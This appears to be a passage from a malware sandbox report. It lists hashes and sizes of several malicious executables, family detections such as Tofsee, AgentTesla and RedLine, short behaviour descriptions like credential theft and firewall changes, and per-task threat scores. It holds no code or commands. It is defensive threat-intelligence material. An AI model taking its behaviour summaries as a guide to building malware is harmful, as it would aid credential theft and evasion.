      1b9334e09c3df74ba3135169e49533c7a4d5a6c7ce090e31188e6f6a33403b52.exe

    • Size

      226KB

    • MD5

      19407c99f4b2baf3fcd8cc632ea60b97

    • SHA1

      b6574e349b99bd865c84e79a0ca596c5fdadcaf4

    • SHA256

      1b9334e09c3df74ba3135169e49533c7a4d5a6c7ce090e31188e6f6a33403b52

    • SHA512

      969235b95372f6df5980151c6fa75ad920cee8004a2a07df114c83aec2b1c83c9a7aa53903842dcd3cfed4cd683664643f1846089386c34733921a4e08edeba5

    • SSDEEP

      3072:EOS07dizsmBglaL0X+qa6eGR5d/Lhvw35WptqsVMn2jCV+btxEnogr:NSlDL0XXabGh/dwCnVM2jCVGtxEog

    • Tofsee

      Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    • Tofsee family

    • Creates new service(s)

    • Modifies Windows Firewall

    • Sets service image path in registry

    • Deletes itself

    • Executes dropped EXE

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    • Target

      1bcbf1dce6780dbfb1b1ad1d86f25d4b7a50063be5b4640f8939085980c4e00c.exe

    • Size

      214KB

    • MD5

      da9914f2f681c7ef59293d3804c9133d

    • SHA1

      49d23c8eac05f7c8af203f0b46f7d805fc4b1724

    • SHA256

      1bcbf1dce6780dbfb1b1ad1d86f25d4b7a50063be5b4640f8939085980c4e00c

    • SHA512

      3eaaf3ba1df0f3fef3141a3f2fb0e455620ffcf569dbe438d8a8a9fa2173c275897001f6ef52b18b138d5f88e9facc053f7e8a6751c655ee320842ee756f0615

    • SSDEEP

      6144:qweEpobsxm+SEfyjP4P3yYZcfrFPWHFjp:bowkAwfrFPWH

    Score
    7/10
    • Executes dropped EXE

    • Target

      1bd3fa491c5de8cb9189ff8f86fd1a7e27a8140e3578f8fa9ebb23931550cc5b.exe

    • Size

      447KB

    • MD5

      d93ae89b2dd80e754f282db2f968e537

    • SHA1

      52d0f0a4cc753daae727e5d79ae575f37042e6c2

    • SHA256

      1bd3fa491c5de8cb9189ff8f86fd1a7e27a8140e3578f8fa9ebb23931550cc5b

    • SHA512

      021879e0ad17ceab7fa3cd29e483da9e7ff6155f4e1e1a493517549d8d25f004f234f6d2caf74944bd4718e6e24c79a5139d4018018350bc7434fafa3230c806

    • SSDEEP

      6144:1HW9ZEjeXjYA2ospqAlwdVgDmETmGJE9i/pfp5thhhhYPDK2gIKb:mZ3XjYA2oXCRBuwpBrjYPDC

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in Visual Basic.

    • Agenttesla family

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

static1

mirai, upx, vmprotect, lzrd, rat, pyinstaller, brouteurs, themida, default, d1d6daf7a5018968dea23d67c142f047, gafgyt, irata, mirai, purecrypter, dcrat, andrmonitor, aurora, rhadamanthys, socelars, stormkitty, systembc, xred, njrat, asyncrat, neshta, raccoon, laplas, snakekeylogger, erbium
Score
10/10

behavioral1

netwire, botnet, discovery, execution, rat, stealer
Score
10/10

behavioral2

execution
Score
10/10

behavioral3

formbook, xloader, fofg, discovery, loader, rat, spyware, stealer, trojan
Score
10/10

behavioral4

redline, discovery, infostealer
Score
10/10

behavioral5

gcleaner, discovery, loader
Score
10/10

behavioral6

discovery, persistence, vmprotect
Score
7/10

behavioral7

discovery
Score
7/10

behavioral8

tofsee, discovery, evasion, execution, persistence, privilege_escalation, trojan
Score
10/10

behavioral9

redline, dozkey, discovery, infostealer
Score
10/10

behavioral10

smokeloader, pub4, backdoor, discovery, trojan
Score
10/10

behavioral11

gcleaner, discovery, loader
Score
10/10

behavioral12

redline, dozkey, discovery, infostealer
Score
10/10

behavioral13

gcleaner, discovery, loader
Score
10/10

behavioral14

discovery
Score
3/10

behavioral15

tofsee, discovery, evasion, execution, persistence, privilege_escalation, trojan
Score
10/10

behavioral16

formbook, a20e, discovery, execution, rat, spyware, stealer, trojan
Score
10/10

behavioral17

vidar, 1636, discovery, stealer
Score
10/10

behavioral18

smokeloader, pub4, backdoor, discovery, trojan
Score
10/10

behavioral19

snakekeylogger, collection, credential_access, discovery, execution, keylogger, spyware, stealer
Score
10/10

behavioral20

Score
3/10

behavioral21

execution
Score
8/10

behavioral22

tofsee, discovery, evasion, execution, persistence, privilege_escalation, trojan
Score
10/10

behavioral23

agenttesla, collection, credential_access, discovery, keylogger, persistence, spyware, stealer, trojan
Score
10/10

behavioral24

Score
10/10

behavioral25

Score
3/10

behavioral26

Score
3/10

behavioral27

discovery
Score
8/10

behavioral28

lokibot, collection, discovery, spyware, stealer, trojan
Score
10/10

behavioral29

discovery
Score
7/10

behavioral30

tofsee, discovery, evasion, execution, persistence, privilege_escalation, trojan
Score
10/10

behavioral31

discovery
Score
7/10

behavioral32

agenttesla, collection, credential_access, discovery, keylogger, spyware, stealer, trojan
Score
10/10
